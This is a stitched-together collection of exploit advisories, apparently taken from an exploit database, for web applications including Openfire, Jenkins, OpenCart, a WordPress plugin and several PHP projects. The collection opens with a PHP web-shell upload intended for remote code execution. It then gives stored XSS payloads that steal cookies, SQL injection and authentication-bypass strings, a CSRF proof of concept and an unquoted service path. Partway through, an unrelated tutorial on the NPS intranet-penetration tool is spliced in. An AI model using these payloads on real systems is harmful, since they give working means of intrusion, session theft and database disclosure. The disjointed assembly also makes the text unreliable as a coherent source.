with a php payload. ("exiftool -Comment='<?php system($_GET['cmd']); ?>'
r0b0t.jpg") Then update profile.
Step 4: Click on username on header again and select Manage Account.
Step 5: Right click on the uploaded php payload or embeded image located
under the "choose avatar form" then copy image location.
Step 6: Start nc listener and paste the url in browser. This will trigger
the remote code execution if you used a php shell. (
http://localhost/assets/uploads/1607438280_shell.php )
# Exploit Title: Task Management System 1.0 - 'First Name and Last Name' Stored XSS
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-08
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
# Tested on: Parrot OS
Step 1: Log in to the CMS with any valid user credentials.
Step 2: Click on the logged in username on header and select Manage Account.
Step 3: Rename the user First Name or Last Name to "
<script>alert(document.domain)</script> ".
Step 4: Update Profile and this will trigger the XSS.
Step 5: Logout and login again and the page will display the domain name.
# Exploit Title: Barcodes generator 1.0 - 'name' Stored Cross Site Scripting
# Date: 10/12/2020
# Exploit Author: Nikhil Kumar
# Vendor Homepage: http://egavilanmedia.com/
# Software Link: http://egavilanmedia.com/barcodes-generator-using-php-mysql-and-jsbarcode-library/
# Version: 1.0
# Tested On: Ubuntu
1. Open the index.php page using following url
http://localhost/Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/index.php
click on the New Barcode
2. Intercept the request through burp suite
Put a payload on "name=" parameter
Payload :- abc"><script>alert("XSS")</script>
Malicious Request::
POST /Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/php/insert.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/index.php
Upgrade-Insecure-Requests: 1
name=abc"><script>alert("XSS")</script>
# Exploit Title: Task Management System 1.0 - 'id' SQL Injection
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-08
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
# Tested on: Parrot OS
Step 1. Log into application with credentials
Step 2. Click on Projects
Step 3. Select View Projects
Step 4. Choose any project, click on action and select view
Step 5. Capture the request of the "page=view_project&id=" page in burpsute
Step 6. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs "
Step 7. This will inject successfully and you will have an information disclosure of all databases contents
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=view_project&id=3 AND 5169=5169
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=view_project&id=3 AND (SELECT 3991 FROM (SELECT(SLEEP(5)))NOXH)
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: page=view_project&id=-2597 UNION ALL SELECT NULL,NULL,CONCAT(0x717a627a71,0x5a46784156705a6e654b6a454d44767155796a466f41436c6667585763424b534a4f4c4e52775a45,0x7176767071),NULL,NULL,NULL,NULL,NULL,NULL-- -
---
# Exploit Title: PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path
# Discovery by: Zaira Alquicira
# Discovery Date: 2020-12-10
# Vendor Homepage: https://pdf-complete.informer.com/3.5/
# Tested Version: 3.5.310.2002
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i
"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "pdfsvc" | findstr /i /v
"""
PDF Complete
PDF Complete C:\Program Files (x86)\PDF Complete\pdfsvc.exe
/startedbyscm:66B66708-40E2BE4D-pdfcService
Auto
# Service info:
C:\Users\TOSHIBA>sc qc "pdfcDispatcher"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: pdfcDispatcher
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\PDF Complete\pdfsvc.exe
/startedbyscm:66B66708-40E2BE4D-pdfcService
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : PDF Document Manager
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# Exploit Title: Library Management System 2.0 - Auth Bypass SQL Injection
# Date: 2020-12-09
# Exploit Author: Manish Solanki
# Vendor Homepage: https://www.sourcecodester.com/php/6849/library-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=6849&title=Library+Management+System+in+PHP%2FMySQLi+with+Source+Code
# Version: 2.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
#Vulnerable Page: admin page
#Exploit
Open the Application
check the URL:
http://localhost/eb_magalona_lms
Open Admin Login
Enter username: a' or 1=1--
Enter password: '
click on login
The SQL payload gets executed and authorization is bypassed successfully
# Exploit Title: Openfire 4.6.0 - 'path' Stored XSS
# Date: 20201209
# Exploit Author: j5s
# Vendor Homepage: https://github.com/igniterealtime/Openfire
# Software Link: https://www.igniterealtime.org/downloads/
# Version: 4.6.0
POST /plugins/nodejs/nodejs.jsp HTTP/1.1
Host: 192.168.137.137:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101
Firefox/68.0
Content-Length: 60
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=node087pcmtxo1yry1fzb5tlt5bz4c19.node0;
csrf=dWiihlZamEAB0mrO; DWRSESSIONID=oWZp3ax5c9EpPgMNZv4T4BASYrwhhv3K8pn;
jiveforums.admin.logviewer=debug.size=0&all.size=524269&warn.size=856459&error.size=0&info.size=145819
Origin: http://192.168.137.137:9090
Referer: http://192.168.137.137:9090/plugins/nodejs/nodejs.jsp
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
path=%22%3E%3CScRiPt%3Eaozunukfyd%3C%2FsCrIpT%3E&update=Save
payload:"><ScRiPt>alert(document.cookie)</ScRiPt>
# Exploit Title: OpenCart 3.0.3.6 - Cross Site Request Forgery
# Date: 12-11-2020
# Exploit Author: Mahendra Purbia {Mah3Sec}
# Vendor Homepage: https://www.opencart.com
# Software Link: https://www.opencart.com/index.php?route=cms/download
# Version: OpenCart CMS - 3.0.3.6
# Tested on: Kali Linux
#Description:
This product have the functionality which let user to add the wish-list of other user in to his/her cart. So, user A can add products to his/her wish-list and can make his/her wish-list public which let other users to see the wish-list. Now, as user B there is a button of add to cart , when you click on it that public wish-list will be added in to your cart.
#Additional Information:
well i found this vulnerability in Opencart based websites but they not respond so i installed a lest version of Opencart CMS and hosted on localhost with help of XAMP and then i exploited that vulnerability.
Attack Vector:
1. create two accounts A(attacker) & B(victim)
2. login with A and add a product in cart and capture that particular request in burpsuite.
3. Now change the quantity if want and then create a csrf poc of that request.
4. Save it as .html and send it to victim. Now the product added to victims cart.
#POC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/shop/index.php?route=checkout/cart/add" method="POST">
<input type="hidden" name="product_id" value="43" />
<input type="hidden" name="quantity" value="10000000" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: Jenkins 2.235.3 - 'tooltip' Stored Cross-Site Scripting
# Date: 11/12/2020
# Exploit Author: gx1
# Vendor Homepage: https://www.jenkins.io/
# Software Link: https://updates.jenkins-ci.org/download/war/
# Version: <= 2.251 and <= LTS 2.235.3
# Tested on: any
# CVE : CVE-2020-2229
# References:
https://www.jenkins.io/security/advisory/2020-08-12/#SECURITY-1955
https://www.openwall.com/lists/oss-security/2020/08/12/4
Vendor Description:
Jenkins 2.251 and earlier, LTS 2.235.3 and earlier does not escape the tooltip content of help icons.
Tooltip values can be contributed by plugins, some of which use user-specified values.
This results in a stored cross-site scripting (XSS) vulnerability.
Jenkins 2.252, LTS 2.235.4 escapes the tooltip content of help icons.
Technical Details and Exploitation:
As it is possible to observe from patch commit:
https://github.com/jenkinsci/jenkins/pull/4918/commits/c991b45b5bae09f9894acdc1f1fb1d8809fe6ef6
The fix to solve the vulnerability is applied to 'core/src/main/resources/lib/layout/svgIcon.jelly' tooltip attribute:
<svg class="svg-icon ${attrs.class}"
viewBox="${attrs.viewBox != null ? attrs.viewBox : '0 0 24 24'}"
focusable="${attrs.focusable != null ? attrs.focusable : 'false'}"
aria-hidden="${attrs.ariaHidden != null ? attrs.ariaHidden : ''}"
style="${attrs.style}"
onclick="${attrs.onclick}"
tooltip="${h.xmlEscape(attrs.tooltip ?: '')}">
svgIcon is a layout element belonging to jenkins core: https://reports.jenkins.io/core-taglib/jelly-taglib-ref.html#layout:svgIcon
As suggested by Jenkins documentation (https://www.jenkins.io/doc/developer/security/xss-prevention/)
"Note that this only affects the use of ${...} among PCDATA, and not in attribute values, so that Jelly tag invocations don’t result in surprising behavior."
Tooltip attribute can contain HTML code, as suggested in form section: https://www.jenkins.io/doc/developer/forms/adding-tool-tips/
For this reason, it is possible to inject XSS code in a Jenkins system by uploading a plugin that contains an <j:svgIcon> element containing a malicious XSS payload in tooltip attribute:
<l:svgIcon tooltip="<img src=a onerror=alert(1)>">...</l:svgIcon>
To build a Jenkins plugin, visit https://www.jenkins.io/doc/developer/tutorial/create/ .
To obtain information about Jelly syntax, visit https://wiki.jenkins.io/display/JENKINS/Basic+guide+to+Jelly+usage+in+Jenkins
Proof Of Concept:
1. Obtain access to upload Jenkins plugins, or find plugins that can insert svgIcon element.
2. Generate a plugin. For example, you can create a class that implements ModelObjectWithContextMenu interface to create a context menu and implement the method getUrlName()
containing a <plugin-url> string that you can navigate by using the link: http(s)://<jenkins_server>/<plugin-url>
3. In jelly file, insert the following element:
<l:svgIcon tooltip="<img src=a onerror=alert(1)>"><path d="M9 16.17L4.83 12l-1.42 1.41L9 19 21 7l-1.41-1.41z"></path></l:svgIcon>
This creates an icon that triggers the Cross-Site Scripting when the mouse is over and opens tooltip. Obviously, you can use css and large size and height to generate a svg element that covers all the screen in order to trigger the XSS when the user navigates the page.
Solution:
The following releases contain fixes for security vulnerabilities:
* Jenkins 2.252
* Jenkins LTS 2.235.4
# Exploit Title: WordPress Plugin Popup Builder 3.69.6 - Multiple Stored Cross Site Scripting
# Date: 11/27/2020
# Exploit Author: Ilca Lucian Florin
# Vendor Homepage: https://sygnoos.com
# Software Link: https://wordpress.org/plugins/popup-builder/ / https://popup-builder.com/
# Version: <= 3.69.6
# Tested on: Latest Version of Desktop Web Browsers: Chrome, Firefox, Microsoft Edge
The Popup Builder – Responsive WordPress Pop up – Subscription & Newsletter
Plugin is vulnerable to stored cross site scripting. There are multiple
parameters vulnerable to cross site scripting.
All versions up to 3.69.6 are vulnerable to stored cross site scripting.
More information about this plugin could be found on the following links:
1. https://wordpress.org/plugins/popup-builder/
2. https://popup-builder.com/
Cross site scripting (XSS) is a common attack vector that injects malicious
code into a vulnerable web application. XSS differs from other web attack
vectors (e.g., SQL injections), in that it does not directly target the
application itself. Instead, the users of the web application are the ones
at risk. A successful cross site scripting attack can have devastating
consequences for an online business’s reputation and its relationship with
its clients. Stored XSS, also known as persistent XSS, is the more damaging
of the two. It occurs when a malicious script is injected directly into a
vulnerable web application.
# How to reproduce #
1. Login as Editor or Administrator: https://website.com/wp-login/
2. Go to the following link:
https://website.com/wp-admin/edit.php?post_type=popupbuilder or search for
PopUp Builder and select or create new PopUp.
2. Click edit
3. Search and find: # Custom JS or CSS
4. On JS -> Opening events section, add two payloads, one for #2 section
and one for #3 section, like in the following example:
#2 Add the code you want to run before the popup opens. This will be the
code that will work in the process of opening the popup. true/false
conditions will not work in this phase.
<textarea class="wp-editor-area editor-content" data-attr-event="WillOpen"
placeholder=" #... type your code" mode="text/javascript"
name="sgpb-WillOpen">"><script
src="data:;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="></script></textarea>
#3 Add the code you want to run after the popup opens. This code will work
when the popup is already open on the page.
<textarea class="wp-editor-area editor-content" data-attr-event="DidOpen"
placeholder=" #... type your code" mode="text/javascript"
name="sgpb-DidOpen">"><script
src="data:;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="></script></textarea>
5. Click Update
6. Go to https://website.com. The XSS alert will pop up.
# All text-areas from JS section are vulnerable to stored cross site
scripting.
Evidence:
1. https://ibb.co/JvBTq0H
2. https://ibb.co/0KP7NFQ
3. https://ibb.co/3cFnVYF
# Exploit Title: Medical Center Portal Management System 1.0 - Multiple Stored XSS
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-10
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14594/medical-center-portal-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14594&title=Medical+Center+Portal+Management+System+using+PHP%2FMySQLi
# Affected Version: Version 1
# Category: Web Application
# Tested on: Parrot OS
Step 1: Log in to the application with any valid user credentials.
Step 2: Click on "Medical Products", select "Add Medical Products", use
"<scrip>alert(1)</script>" in both name ad description fields. Complete the
other fields and save product.
Step 3: Once you click on save, this should trigger the XSS payload.
clicking on the "Medical Products" page anytime will trigger the Stored XSS
Payload
Note: Same method applies to "Add New Hospital | Pharmacy page"
Step 1: Use "<scrip>alert("r0b0tG4nG")</script>" as hospital/pharmacy name,
fill the other required information and click on save. Your payload will be
executed anytime you click on "Medical Products" page or "Add New Hospital
| Pharmacy page" page.
# Exploit Title: Openfire 4.6.0 - 'users' Stored XSS
# Date: 2020/12/11
# Exploit Author: j5s
# Vendor Homepage: https://github.com/igniterealtime/Openfire
# Software Link: https://www.igniterealtime.org/downloads/
# Version: 4.6.0
POST /plugins/bookmarks/create-bookmark.jsp HTTP/1.1
Host: 192.168.137.137:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Length: 144
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=node087pcmtxo1yry1fzb5tlt5bz4c19.node0;
csrf=j0MLh55rjr1bMx0; DWRSESSIONID=oWZp3ax5c9EpPgMNZv4T4BASYrwhhv3K8pn
Origin: http://192.168.137.137:9090
Referer: http://192.168.137.137:9090/plugins/bookmarks/create-bookmark.jsp?type=group_chat
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
createGroupchatBookmark=%E5%BB%BA%E7%AB%8B&groupchatJID=&groupchatName=&groups=&type=groupchat&users=%22%3E%3CScRiPt%3Ekcxbfhabog%3C%2FsCrIpT%3E
Vulnerable parameters:users
payload:"><ScRiPt>alert(document.cookie)</ScRiPt>
# Exploit Title: Openfire 4.6.0 - 'groupchatJID' Stored XSS
# Date: 2020/12/11
# Exploit Author: j5s
# Vendor Homepage: https://github.com/igniterealtime/Openfire
# Software Link: https://www.igniterealtime.org/downloads/
# Version: 4.6.0
POST /plugins/bookmarks/create-bookmark.jsp HTTP/1.1
Host: 192.168.137.137:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101
Firefox/68.0
Content-Length: 144
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=node087pcmtxo1yry1fzb5tlt5bz4c19.node0;
csrf=j0MLh55rjr1bMx0; DWRSESSIONID=oWZp3ax5c9EpPgMNZv4T4BASYrwhhv3K8pn
Origin: http://192.168.137.137:9090
Referer:
http://192.168.137.137:9090/plugins/bookmarks/create-bookmark.jsp?type=group_chat
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
createGroupchatBookmark=%E5%BB%BA%E7%AB%8B&groupchatJID=%22%3E%3CsCrIpT%3Evkhewwrqrb%3C%2FsCrIpT%3E&groupchatName=&groups=&type=groupchat&users=
Vulnerable parameters:groupchatJID
payload:"><ScRiPt>alert(document.cookie)</ScRiPt>
# Exploit Title: Openfire 4.6.0 - 'sql' Stored XSS
# Date: 20201211
# Exploit Author: j5s
# Vendor Homepage: https://github.com/igniterealtime/Openfire
# Software Link: https://www.igniterealtime.org/downloads/
# Version: 4.6.0
POST /plugins/dbaccess/db-access.jsp HTTP/1.1
Host: 192.168.137.137:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101
Firefox/68.0
Content-Length: 78
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=node087pcmtxo1yry1fzb5tlt5bz4c19.node0;
csrf=zsq8G2h1dxK9JST; DWRSESSIONID=oWZp3ax5c9EpPgMNZv4T4BASYrwhhv3K8pn;
jiveforums.admin.logviewer=debug.size=0&all.size=524269&warn.size=856459&error.size=0&info.size=145819
Origin: http://192.168.137.137:9090
Referer: http://192.168.137.137:9090/plugins/dbaccess/db-access.jsp
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
execute=Execute+SQL&sql=%3C%2FTeXtArEa%3E%3CsCrIpT%3Etkfbrxuddq%3C%2FScRiPt%3E
Vulnerable parameters:sql
payload:"><ScRiPt>alert(document.cookie)</ScRiPt>
In a previous article. We talked about how to use FRP for intranet mapping. This allows intranet devices to be logged in through the public network. However, frp is relatively implemented by configuring command parameters. It's still a bit challenging for Xiaobai. Today I will introduce another simple method.
About NPS
nps is a lightweight, high-performance, and powerful intranet penetration proxy server. Currently, it supports tcp and udp traffic forwarding, and can support any tcp and udp upper-layer protocol (access to intranet websites, local payment interface debugging, SSH access, remote desktop, intranet dns resolution, etc.). In addition, it also supports intranet ttp proxy and intranet socks5 proxy, and has a powerful web management end.
Experimental Environment
Public network vps (server centos7) user side (kali linux, Windows 10)
Download nps
First, download it to the project address according to your own system type. The server is linux_arm64_server.tar.gz The client is windows_amd64_client.tar.gz
Installing the server
Download the server side according to the type of the public network server.
mkdir nps
cd
wget https://github.com/ehang-io/nps/releases/download/v0.26.10/linux_amd64_server.tar.gz
tar -zxvf linux_amd64_server.tar.gz configuration nps.confvim conf/nps.conf modification part
#web
web_host=a.o.com —— Cloud server public IP address
web_username=admin ——web console account settings
web_password=123 ——web console password settings
web_port=8080
web_ip=0.0.0.0
web_base_url=
web_open_ssl=false
web_cert_file=conf/server.pem
web_key_file=conf/server.key 
Install nps execution command
./nps install
./nps start #Start 
Access the web console
Browser access ip:8080 (the corresponding ports need to be opened for security group and firewall) 
Enter the account number and password in your configuration file to log in.
As mentioned above, after logging in to the background, we only need to add the mapped target in the background according to actual needs.
Add mapping directory
After the configuration is completed, click Submit.
Then click on the client and add a new client. Record the key!
Click tcp—— to add and fill in the corresponding parameters according to the actual situation. Note that the client ID is the client ID we created in the previous step.
Configure client
Here, let’s take kali’s port 22 as an example.
First, download the corresponding client linux_arm64_client.tar.gz.
mkdir nps
wget https://github.com/ehang-io/nps/releases/download/v0.26.10/linux_arm64_client.tar.gz
tar -zxvf linux_arm64_client.tar.gz is decompressed, the file is as follows 
Connect
We only need the following command to achieve the connection.
./npc -server=Public IP:8024 -vkey=Your client key -type=tcp 
The client has also been successfully launched.
Test
# Exploit Title: Jenkins 2.235.3 - 'Description' Stored XSS
# Date: 11/12/2020
# Exploit Author: gx1
# Vendor Homepage: https://www.jenkins.io/
# Software Link: https://updates.jenkins-ci.org/download/war/
# Version: <= 2.251 and <= LTS 2.235.3
# Tested on: any
# CVE : CVE-2020-2230
# References:
https://www.jenkins.io/security/advisory/2020-08-12/#SECURITY-1957
https://www.openwall.com/lists/oss-security/2020/08/12/4
Vendor Description:
Jenkins 2.251 and earlier, LTS 2.235.3 and earlier does not escape the project naming strategy description that is displayed on item creation.
This results in a stored cross-site scripting (XSS) vulnerability exploitable by users with Overall/Manage permission.
Jenkins 2.252, LTS 2.235.4 escapes the project naming strategy description.
Technical Details and Exploitation:
As it is possible to observe from patch commit:
https://github.com/jenkinsci/jenkins/pull/4918/commits/7529ce8905910849e890b7e26d6563e0d56189d2
The fix to solve the vulnerability is applied in activateValidationMessage function to 'war/src/main/js/add-item.js' javascript file:
function activateValidationMessage(messageId, context, message) {
...
$(messageId, context).html('» ' + message); // AFTER FIX: $(messageId, context).text('» ' + message);
...
}
The function is called during the creation of a new Item, on "blur input" event (when text element of name input is focused):
$('input[name="name"]', '#createItem').on("blur input", function() {
if (!isItemNameEmpty()) {
var itemName = $('input[name="name"]', '#createItem').val();
$.get("checkJobName", { value: itemName }).done(function(data) {
var message = parseResponseFromCheckJobName(data);
if (message !== '') {
activateValidationMessage('#itemname-invalid', '.add-item-name', message); // INJECTION HERE
} else {
cleanValidationMessages('.add-item-name');
showInputHelp('.add-item-name');
setFieldValidationStatus('name', true);
if (getFormValidationStatus()) {
enableSubmit(true);
}
}
});
} else {
....
activateValidationMessage('#itemname-required', '.add-item-name');
}
});
as "message" param is the injection point, we need to trigger an "invalid item name": when you are creating a new item and the name is not compliant with validation rules, an error is triggered. Error message is not escaped for vulnerable versions, so it is vulnerable to XSS.
Validation rules can trigger an error in several ways, for example:
- if the current item name is equal to an already existent item name;
- if a project naming strategy is defined: in this case, if the project name is not compliant with a regex strategy, a error message is shown.
In the first case Jenkins seems to be protected because when a new project is created, it is not possible to insert malicious characters (such as <,>).
In the second case, the error message also shows a description, that can be provided by the user during the regex strategy creation. In description field, it is possible to inject malicious characters, so it is possible to insert an XSS payload in description field.
When the user insert a name that is not compliant with project naming strategy, the XSS is triggered.
Proof Of Concept:
1. In <jenkins_url>/configure create a new Project Naming Strategy (enable checkbox "Restrict project naming") containing the following values:
Pattern: ^TEST.*
Description: GX1h4ck <img src=a onerror=alert(1)>
2. Go to New element creation section (/<jenkins_url>/jenkins/view/all/newJob).
When you insert a character in the name field, alert is triggered.
Solution:
The following releases contain fixes for security vulnerabilities:
* Jenkins 2.252
* Jenkins LTS 2.235.4